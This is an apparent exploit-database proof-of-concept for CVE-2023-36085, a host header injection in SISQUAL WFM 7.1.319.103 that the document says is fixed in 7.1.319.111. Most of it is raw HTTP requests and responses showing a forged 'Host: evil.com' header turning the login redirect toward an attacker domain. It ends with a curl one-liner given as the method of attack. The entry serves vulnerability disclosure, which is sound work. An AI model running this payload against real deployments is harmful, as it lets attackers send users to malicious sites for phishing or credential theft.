SISQUAL WFM 7.1.319.103 Host Header Injection

# Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection# Discovered Date: 17/03/2023# Reported Date: 17/03/2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://www.sisqualwfm.com# Version: 7.1.319.103# Tested on: SISQUAL WFM 7.1.319.103# Affected Version: sisqualWFM - 7.1.319.103# Fixed Version: sisqualWFM - 7.1.319.111# CVE : CVE-2023-36085# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)# Category: Web Apps# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.****************************************************************************************************Orignal Request****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: sisqualwfm.cloudCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Orignal Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://sisqualwfm.cloud/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginDate: Wed, 22 Mar 2023 13:22:10 GMTContent-Length: 0****************************************************************************************************██████╗  ██████╗  ██████╗██╔══██╗██╔═══██╗██╔════╝██████╔╝██║   ██║██║     ██╔═══╝ ██║   ██║██║     ██║     ╚██████╔╝╚██████╗╚═╝      ╚═════╝  ╚═════╝                ****************************************************************************************************Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: evil.comCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://evil.com/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginContent-Length: 0****************************************************************************************************Method of Attack****************************************************************************************************curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv****************************************************************************************************